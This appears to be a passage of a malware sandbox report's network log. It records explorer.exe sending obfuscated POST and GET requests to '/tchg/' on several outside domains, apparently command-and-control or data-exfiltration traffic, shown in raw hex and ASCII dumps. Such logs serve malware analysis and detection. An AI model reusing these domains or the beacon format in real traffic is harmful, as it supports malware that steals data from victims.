                                                                                                                    Data Ascii: mzGGuxuH98e8fv4urILiv4u65tmuyb1UE7jYfbHGiq6_uvUDr7jwFKjoeF5tbp0HO77JW1nYnlIzD3OoGXVFtCXhWFsAtQ1yb9UlCAkKU3G9WJQxomqovv9ucCFj8lfgMnqUKVngIiqz(lRPKUAo4T51wfkZj3I_8e03F33hnF(9Pm12EJE8EvPUVJ~kdNaf4rhiphKy0lp1M0j3YRuT7twZWEFOgaRwVHYsDVkSHAdjUXgerdd
                                                                                                                    May 30, 2023 11:10:01.540695906 CEST869OUTData Raw: 49 4c 56 6c 76 65 36 79 44 79 58 76 30 33 69 43 70 6e 38 4a 4a 6a 74 64 65 71 43 78 54 51 65 53 59 59 59 6e 47 62 76 78 72 31 59 36 33 4f 74 73 45 34 58 79 42 43 36 45 30 77 28 70 77 37 6e 5a 69 48 49 33 48 57 39 33 73 33 44 58 4a 64 74 77 68 56
                                                                                                                    Data Ascii: ILVlve6yDyXv03iCpn8JJjtdeqCxTQeSYYYnGbvxr1Y63OtsE4XyBC6E0w(pw7nZiHI3HW93s3DXJdtwhV(5PIXEjWt-XNYjGLAXxJzrMkrS~mAGuVhnz4fy1yQLE2auoQ7J3MXyw3GRO76vu1h7vpUIhZlf2iXF1Z9tqxursNyZsjv-sDlTGGAkALlqdAErBMiRm2Jw6Cy92DD3wSH40NmSq_WpRFZcidzaNUWWu3eCJxCmDvQ


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    38192.168.11.2049797185.106.208.380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:04.022859097 CEST869OUTGET /tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.albaymedya.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:10:04.069657087 CEST870INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:10:03 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    39192.168.11.2049798162.215.249.4080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:09.665952921 CEST871OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.roconsultores.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.roconsultores.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.roconsultores.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4d 4c 47 71 50 59 64 66 44 30 37 75 35 71 69 58 39 43 73 33 4c 45 4f 79 71 67 7e 38 6f 65 38 78 47 47 6e 56 47 61 37 75 77 7a 38 74 69 56 62 42 61 75 59 53 68 5f 58 71 35 68 75 57 70 55 4a 4d 4e 49 55 70 63 49 79 36 53 46 48 46 45 76 55 45 37 50 6f 79 4b 34 76 50 77 70 45 72 69 58 78 70 50 46 53 44 67 46 64 57 48 6e 71 6e 4b 32 6b 43 34 5f 39 78 4d 30 4a 30 7a 72 76 66 72 49 46 6b 76 6b 43 5a 48 42 6b 41 49 69 50 4b 6f 79 30 7a 7e 54 6c 63 52 79 44 62 77 5a 79 33 36 4b 74 6a 55 55 4a 48 4a 42 4a 33 59 4f 71 71 75 42 63 4e 64 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=MLGqPYdfD07u5qiX9Cs3LEOyqg~8oe8xGGnVGa7uwz8tiVbBauYSh_Xq5huWpUJMNIUpcIy6SFHFEvUE7PoyK4vPwpEriXxpPFSDgFdWHnqnK2kC4_9xM0J0zrvfrIFkvkCZHBkAIiPKoy0z~TlcRyDbwZy36KtjUUJHJBJ3YOqquBcNdg).
                                                                                                                    May 30, 2023 11:10:09.841588020 CEST872INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:10:09 GMT
                                                                                                                    Server: Apache
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Last-Modified: Tue, 23 Apr 2019 07:54:14 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Content-Length: 4677
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 ef 66 51 6d 42 3c ff 71 d3 a2 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87
                                                                                                                    Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}*mD3qIcy+!Ef}~`i/~]B&
                                                                                                                    May 30, 2023 11:10:09.841666937 CEST874INData Raw: 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99 f2 56 8a 87 e9 e1 08 2a 91 a6 52 e7 43 78 ce 7b 6b 7f 5f d6 68 0b 54 ea fe 21 64 6e 44 33 da c1 62 a2 78 69 04 dd db ac 90 0e bf 1a 78 1c 05 b3 c7 cb
                                                                                                                    Data Ascii: /VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o[[iG^6|h7+*(Dk3Aa0;
                                                                                                                    May 30, 2023 11:10:09.841726065 CEST875INData Raw: c9 54 67 1a 30 2b f3 7c c0 9d 7f 7e 40 28 27 a3 a2 c2 c4 c1 7f 48 9c c1 95 9f 7b a1 33 da 0f 6a 73 72 14 8e bf c3 54 0a b8 15 93 4d 85 8f e2 89 a2 e4 ee 73 4d dc 93 44 09 6b 3d bb 14 7b e3 c2 b9 6a 18 2d da 1c 9a 9d e4 b2 6f 1b 1b 85 7c 6d 34 61
                                                                                                                    Data Ascii: Tg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm^jTRm=9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c8
                                                                                                                    May 30, 2023 11:10:09.841778994 CEST876INData Raw: fb f0 37 a2 52 89 70 e5 1d 57 4f fb 7e a6 e9 fa a0 ae 62 ab 21 d6 2f 10 97 72 01 9f 08 bd 14 f9 40 e3 85 f3 fd ae 88 fb cd ed 6c 9d f6 05 2d 45 03 1a db 0a fb ea 6c 0d 09 c9 f1 51 4b be d9 24 b5 db 67 c9 06 a6 de f8 da b2 59 c2 7a 4b 6f 0b 46 b7
                                                                                                                    Data Ascii: 7RpWO~b!/r@l-ElQK$gYzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    4192.168.11.2049763109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:11.585890055 CEST279OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.minskadue.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.minskadue.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4a 66 36 71 42 64 64 50 7e 53 4a 6f 35 7a 59 50 50 59 78 42 54 70 4b 48 38 73 4b 57 73 2d 76 6c 4c 4b 71 38 6c 6e 4c 51 50 5a 33 76 28 61 38 32 38 6c 56 6d 37 39 48 72 6d 6d 54 56 30 61 58 56 33 32 65 48 54 70 73 49 77 77 7e 37 4c 36 72 31 46 59 63 35 55 63 71 4e 72 6d 68 33 51 67 46 55 48 43 45 65 70 54 79 54 55 31 55 30 45 57 56 61 74 73 42 4d 64 52 39 33 67 64 62 65 4a 68 53 30 7e 4f 45 33 6d 61 6a 69 6e 37 64 66 46 4c 32 42 31 49 61 51 51 7a 45 73 4a 59 4c 6e 4a 54 30 69 6b 67 6f 34 45 6a 50 49 67 67 66 79 6f 46 54 5f 30 36 32 56 4d 67 68 36 31 39 75 6d 75 56 39 62 51 66 78 5a 51 50 56 5a 4a 50 69 65 43 62 4c 41 63 6c 63 31 46 63 62 35 6e 78 7a 52 54 38 63 44 6a 59 64 44 68 44 4b 5f 57 6a 7a 42 6f 65 41 57 6c 70 45 46 4b 55 46 75 31 4b 48 50 70 7a 4b 33 28 67 33 62 71 71 66 55 4a 77 50 73 45 57 69 33 4d 63 44 6a 6e 6b 34 4e 47 73 32 45 71 6d 36 6d 7e 52 68 49 4d 53 41 38 4a 6d 70 5a 4d 41 30 47 50 32 58 78 48 54 62 6c 74 6a 6a 30 53 45 7e 36 56 4f 59 68 4f 5f 7a 61 66 69 34 52 51 52 7e 33 76 66 51 4e 37 6d 31 45 76 77 6f 67 49 59 70 4c 53 33 6c 42 57 65 32 4d 66 48 4e 46 51 7a 54 39 52 44 74 41 30 57 7a 6d 51 4c 39 61 4f 74 45 59 4d 6b 55 77 47 31 53 77 44 6c 6e 71 37 69 5a 63 79 46 36 7a 65 6c 28 6e 70 76 71 63 30 58 48 32 36 41 65 45 64 64 55 67 73 74 71 6d 56 48 33 37 44 5f 79 6e 33 78 45 59 59 33 77 68 72 64 47 35 61 59 4c 4e 35 38 64 7a 6b 61 51 32 69 55 68 53 44 32 48 6b 48 38 57 75 32 4d 59 43 68 38 49 38 57 6c 35 58 4c 44 6b 49 52 4e 6b 6d 4b 41 35 69 51 5a 4a 57 4c 69 4a 30 28 41 6b 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=OLHqfGxlEzJpJf6qBddP~SJo5zYPPYxBTpKH8sKWs-vlLKq8lnLQPZ3v(a828lVm79HrmmTV0aXV32eHTpsIww~7L6r1FYc5UcqNrmh3QgFUHCEepTyTU1U0EWVatsBMdR93gdbeJhS0~OE3majin7dfFL2B1IaQQzEsJYLnJT0ikgo4EjPIggfyoFT_062VMgh619umuV9bQfxZQPVZJPieCbLAclc1Fcb5nxzRT8cDjYdDhDK_WjzBoeAWlpEFKUFu1KHPpzK3(g3bqqfUJwPsEWi3McDjnk4NGs2Eqm6m~RhIMSA8JmpZMA0GP2XxHTbltjj0SE~6VOYhO_zafi4RQR~3vfQN7m1EvwogIYpLS3lBWe2MfHNFQzT9RDtA0WzmQL9aOtEYMkUwG1SwDlnq7iZcyF6zel(npvqc0XH26AeEddUgstqmVH37D_yn3xEYY3whrdG5aYLN58dzkaQ2iUhSD2HkH8Wu2MYCh8I8Wl5XLDkIRNkmKA5iQZJWLiJ0(Ak.
                                                                                                                    May 30, 2023 11:08:11.625941992 CEST280INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:11 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    40192.168.11.2049799162.215.249.4080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:12.358854055 CEST878OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.roconsultores.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.roconsultores.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.roconsultores.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4d 4c 47 71 50 59 64 66 44 30 37 75 28 4b 53 58 28 68 45 33 41 45 4f 78 76 67 7e 38 69 2d 38 74 47 47 72 56 47 61 53 78 77 41 49 74 37 33 44 42 64 76 59 53 6d 5f 58 71 79 42 76 53 30 45 4a 46 4e 49 59 68 63 4a 7e 36 53 46 54 46 46 64 63 45 71 50 70 6b 45 59 76 41 6d 35 45 51 6f 33 77 6f 50 46 57 31 67 45 35 57 48 30 75 6e 4c 7a 51 43 72 37 70 2d 62 55 4a 49 69 62 76 63 7e 34 46 2d 76 6b 7e 37 48 44 6b 36 50 55 28 4b 6f 53 55 7a 28 54 6c 66 62 43 44 51 34 35 7a 6e 70 61 30 6d 55 56 30 35 52 67 6c 4a 65 64 54 68 72 46 56 6d 50 70 36 5f 6f 6a 54 68 79 33 47 6f 32 4b 57 7a 37 65 59 50 55 70 37 59 68 4d 7e 43 6a 75 30 62 38 69 53 56 57 45 4f 72 6f 56 76 66 4b 4b 53 34 66 52 61 70 76 66 51 6d 47 6d 79 68 42 68 78 45 6e 30 41 39 48 46 6a 52 6d 68 28 35 79 32 70 4a 64 6a 72 57 51 56 7e 55 4b 64 58 44 5a 77 61 74 71 76 71 76 68 6c 36 51 70 47 65 39 77 43 62 37 65 72 53 72 6b 57 4f 62 41 52 70 39 28 65 4c 32 4c 47 4a 50 59 45 54 51 45 36 4e 4c 68 55 53 7a 58 41 45 54 6c 42 50 46 4f 39 6b 75 62 4a 51 59 42 5a 38 7a 70 66 68 45 68 76 34 4a 77 53 48 6f 62 73 65 50 66 5a 57 66 32 74 69 58 64 4e 31 5a 43 4b 42 36 59 6e 45 32 48 61 4a 58 32 76 47 63 76 75 28 70 4d 32 42 34 73 33 55 42 62 39 4a 42 36 59 67 30 47 39 38 36 4f 72 71 4a 33 61 4e 5f 5a 6b 63 71 74 57 34 78 52 49 42 63 46 57 37 73 71 56 63 32 4a 33 78 58 48 52 44 6b 50 72 35 77 75 63 68 73 47 75 53 63 42 34 34 5a 69 35 66 4b 38 49 78 50 43 31 65 70 31 65 61 4b 30 72 6b 75 4e 5f 76 6e 77 37 52 57 7a 6e 4f 39 73 4c 4f 55 49 6d 36 46 69 75 44 37 75 66 57 73 43 63 4e 55 59 30 4e 58 7e 70 77 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=MLGqPYdfD07u(KSX(hE3AEOxvg~8i-8tGGrVGaSxwAIt73DBdvYSm_XqyBvS0EJFNIYhcJ~6SFTFFdcEqPpkEYvAm5EQo3woPFW1gE5WH0unLzQCr7p-bUJIibvc~4F-vk~7HDk6PU(KoSUz(TlfbCDQ45znpa0mUV05RglJedThrFVmPp6_ojThy3Go2KWz7eYPUp7YhM~Cju0b8iSVWEOroVvfKKS4fRapvfQmGmyhBhxEn0A9HFjRmh(5y2pJdjrWQV~UKdXDZwatqvqvhl6QpGe9wCb7erSrkWObARp9(eL2LGJPYETQE6NLhUSzXAETlBPFO9kubJQYBZ8zpfhEhv4JwSHobsePfZWf2tiXdN1ZCKB6YnE2HaJX2vGcvu(pM2B4s3UBb9JB6Yg0G986OrqJ3aN_ZkcqtW4xRIBcFW7sqVc2J3xXHRDkPr5wuchsGuScB44Zi5fK8IxPC1ep1eaK0rkuN_vnw7RWznO9sLOUIm6FiuD7ufWsCcNUY0NX~pw.
                                                                                                                    May 30, 2023 11:10:12.534517050 CEST879INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:10:12 GMT
                                                                                                                    Server: Apache
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Last-Modified: Tue, 23 Apr 2019 07:54:14 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Content-Length: 4677
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 ef 66 51 6d 42 3c ff 71 d3 a2 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87
                                                                                                                    Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}*mD3qIcy+!Ef}~`i/~]B&
